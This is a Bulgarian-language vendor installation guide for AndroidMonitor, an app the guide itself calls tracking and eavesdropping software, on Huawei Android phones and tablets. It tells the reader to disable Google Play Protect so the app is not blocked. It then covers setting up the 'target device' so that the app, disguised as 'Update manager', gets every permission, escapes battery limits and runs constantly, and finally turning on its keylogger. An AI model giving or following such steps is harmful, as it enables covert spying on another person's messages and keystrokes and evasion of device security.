Как се настройват Huawei телефони и таблети с Android 6.x (като P8 Lite ALE-L21)

Устройствата от Huawei изискват допълнителна конфигурация за да може софтуера за проследяване и подслушване да работи нормално. Моля, последвайте този бърз и лесен видео наръчник внимателно. Ако все пак имате някакви затруднения, моля свържете се с нас.

Преди да свалите приложението е нужно да изключите "Google Play Protect" (защото ще блокира приложението и то няма да може да заработи). Може да прегледате този видео урок за това как се спира Google Play Protect, или пък да последвате следващите инструкции:

 • Отворете "Google Play" или "Play Store"
 • Кликнете на иконката "Настройки" в горния ляв ъгъл на екран
 • След това намерете "Play Protect" и кликнете върху него
 • След това се уверете, че "Scan device for security threats" е изключено. С това изключването на Google Play Protect приключи.

След като вече Google Play Protect е бил спрян, може да продължим към свалянето на приложението.След като програмата е била свалена, инсталирайте я, но НЕ Я СТАРТИРАЙТЕ все още. Настройте вашето устройство (телефон или таблет) като последвате инструкциите по-долу (и само след това се върнете към приложението):

Отидете в "Settings" -> "Data traffic management" -> "Mobile network settings"

 • изключете "Mobile data always on"

Отидете в "Settings" -> "Data traffic management" -> "Mobile network settings" -> "Networked apps"

 • Уверете се, че "Update manager" и двете опции "Mobile data" и "Wi-Fi" са включени

Отидете в "Settings" -> "Apps" -> "Update manager" -> "Data usage"

 • Плъзнете се до дъното на списъка докато да видите 4 опции ("Mobile data", "Wi-Fi", "Background data" и "Roaming data")
 • Уверете се, че и четирите опции са включени

Отидете в "Settings" -> "Apps" -> "Update manager" -> "Permissions"

 • Уверете се, че всички опции са включени

Отидете в "Settings" -> "Apps" -> "Advanced" (в долния ляв ъгъл на екрана) -> "Ignore optiomisations"

 • Кликнете върху стрелкичката, която гледа надолу, която е позиционирана от левия край на "Allowed", и след това когато се покажат двете опции изберете "All apps" така, че да може да видите всички опции и игнорирайте оптимизациите за нашата програма ("Update manager")
 • След това намерете в списъка с приложения "Update manager", кликнете на нея, и изберете "Allow", което ще позволи на нашата програма да работи на устройството

Отидете в "Settings" -> "Advanced settings" -> "Battery manager" -> "Protected apps"

 • Открийте "Update manager" и се уверете, че е защитено като плъзнете плзгата от левия край на приложението докато да се включи

Отидете в "Settings" -> "Advanced settings" -> "Battery manager" -> Кликнете на зъбчатата иконка (горен десен ъгъл на екрана, точно под часовника)

 • Уверете се, че "power-intensive prompt" е изключено
 • Уверете се, че "Close excessively power-intensive apps" е изключено
 • Уверете се, че "Keep Wi-Fi on during sleep" е зададено на "Always"
 • Уверете се, че "Keep mobile data on during sleep" в включено

След като вече и целевото устройство е правилно настроено, може да приключим с инсталационната процедура като отворим AndroidMonitor, кликайки върху иконата на "Update manager". Когато отворите програмата, уверете се, че ще следвате внимателно инсталационните инструкции във самата програма, а именно да включите "Improve stability" и да включите "Enable Key Logger" опциите.

Може да искате да прегледате и общ наръчник за инсталация и/или да прегледате инсталационния наръчник за по-нови Huawei устройства.

AndroidMonitor е програма за проследяване и наблюдение на Андроид мобилни телефони и таблети.
Платете безопасно чрез: